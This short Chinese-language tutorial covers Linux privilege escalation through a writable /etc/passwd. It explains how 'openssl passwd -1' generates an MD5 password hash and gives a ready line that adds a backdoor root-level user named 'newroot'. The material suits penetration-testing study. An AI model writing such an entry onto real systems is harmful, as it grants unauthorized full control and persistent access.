用OpenSSL生成哈希密钥

在提权过程中，如果可以对/etc/passwd文件进行写入，则可以通过ssl在本地生成哈希密钥，将其作为新root用户的密钥写入/etc/passwd

ssl用md5生成哈希密钥指令：

openssl passwd -1 -salt mypassword mypassword

1. openssl: 这是调用 OpenSSL 命令行工具，它是一个强大的加密工具包，用于各种加密操作，包括密码哈希。

2. passwd: 这是 OpenSSL 中用于生成密码哈希的命令。

3. -1: 这个选项告诉 passwd 命令使用 MD5 算法。MD5 是一种较老的哈希算法，虽然在许多场合仍在使用，但不再被认为是最安全的选择。

4. -salt mypassword: 这里 -salt 选项后跟的 mypassword 是用于哈希过程的盐值。盐值是一种随机数据，用于和密码组合，增加密码破解的难度。

5. 最后的 mypassword: 这是要被哈希的实际密码，在这个例子中密码就是 "mypassword"。

生成哈希密钥后，将如下内容写入/etc/passwd即可新建一个密码为“mypassword”的新root用户：
 

newroot:$1$mypasswo$gP5WtaHnASiKctngsVs2e.:0:0::/root:/bin/bash